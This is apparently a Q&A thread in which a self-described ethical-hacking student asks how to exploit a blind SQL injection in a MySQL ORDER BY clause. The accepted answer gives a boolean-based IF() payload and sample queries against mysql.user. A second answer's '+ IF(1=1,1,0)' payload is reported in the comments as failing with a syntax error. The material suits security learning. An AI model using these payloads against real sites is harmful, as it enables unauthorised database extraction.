# Crafting a query for Blind SQL Injection

Tags: mysql, sql-injection

I have found one my demo website is vulnerable to SQL INJECTION (me currently doing CEH)

Discovered injection point is as follows:

```
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [*INJECTION POINT FOUND HERE*]
```

Now i need to craft something which could help me exploit this injection point that i have discovered. As far as I know UNION SELECT wont work after `ORDER BY`. However, I do think that blind sql injection may work as illustrated below

```
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [if 1=1 then 1,blank]
```

Now if 1 is posted at the injection point the query gives error, whereas if its kept blank the query will execute...THUS blind sql injection will work

Can someone please help me craft a query with `IF THEN ELSE` in `SQL` as I don't know how to use `IF THEN ELSE` in sql..

Tried Injecting this but not working

(IF (1=2) then 1 endif)

Complete query

```
SELECT  column_1, column_2, column_3  from `table_1`  WHERE   `column_4` = '[*available injection point*]'  order by id [*available injection point*] ASC  limit [*available injection point*],[*available injection point*]
```

Comment: I smell a rat in here...

Comment: Just out of curiosity why are you purposely trying to create a successful injection?

Comment: @ExplosionPills he is "currently doing `CEH`"

Comment: What are you trying to do?

Comment: Doing 'Certified Ethical Hacking'... I have already learnt normal union based sql injection. But not Blind SQL Injection, so wanted help with it

Comment: @user2511961 Why can't you just do `UNION SELECT` after the `order by id`?

Comment: try this link - http://dev.mysql.com/doc/refman/5.0/en/if.html

Comment: General error: 1221 Incorrect usage of UNION and ORDER BY

Comment: Read this paper: http://www.net-security.org/dl/articles/Blind_SQLInjection.pdf

Comment: I wonder why this question isn't closed already.

Comment: @YourCommonSense why did you note vote for close then?

Comment: @kevin if then else as specified in the link you gave is not working..
(IF (1=1) then 1 endif)

Comment: Is `id` unique in the result set?

Answer (score 0, accepted):

If `id` is not unique in the result set and there is another column whose values are unique per `id`, you can do the following:

1. Identify the order of the unique per ID value with `, unique_per_id` (must be different to `id` only, use `desc` on `id` if necessary).
2. Boolean-based blind injection is possible with `, IF(1=1,unique_per_id,id)`.

Example:

```
mysql> select host,user from mysql.user order by user;
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| localhost | root             |
| 127.0.0.1 | root             |
+-----------+------------------+
2 rows in set (0.00 sec)

mysql> select host,user from mysql.user order by user,host;
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| 127.0.0.1 | root             |
| localhost | root             |
+-----------+------------------+
2 rows in set (0.00 sec)

mysql> select host,user from mysql.user order by user,if(1=1,host,user);
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| 127.0.0.1 | root             |
| localhost | root             |
+-----------+------------------+
2 rows in set (0.00 sec)

mysql> select host,user from mysql.user order by user,if(1=0,host,user);
+-----------+------------------+
| host      | user             |
+-----------+------------------+
| localhost | root             |
| 127.0.0.1 | root             |
+-----------+------------------+
2 rows in set (0.00 sec)
```

So whenever the result set’s order with `if(expr,host,user)` is identical to the order with just `host` (second query), the condition `expr` was true.

Answer (score -1):

You can inject:

```
+ IF(1=1, 1, 0)
```

The resulting query will be:

```
SELECT column_1,column_2,column_3
from table_1 
where column_4='3'
order by id + IF(1=1, 1, 0)
```

Comment: Not working ....Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'IF(1=1, 1, 0)' at line 1

Comment: Edit your question with the complete query.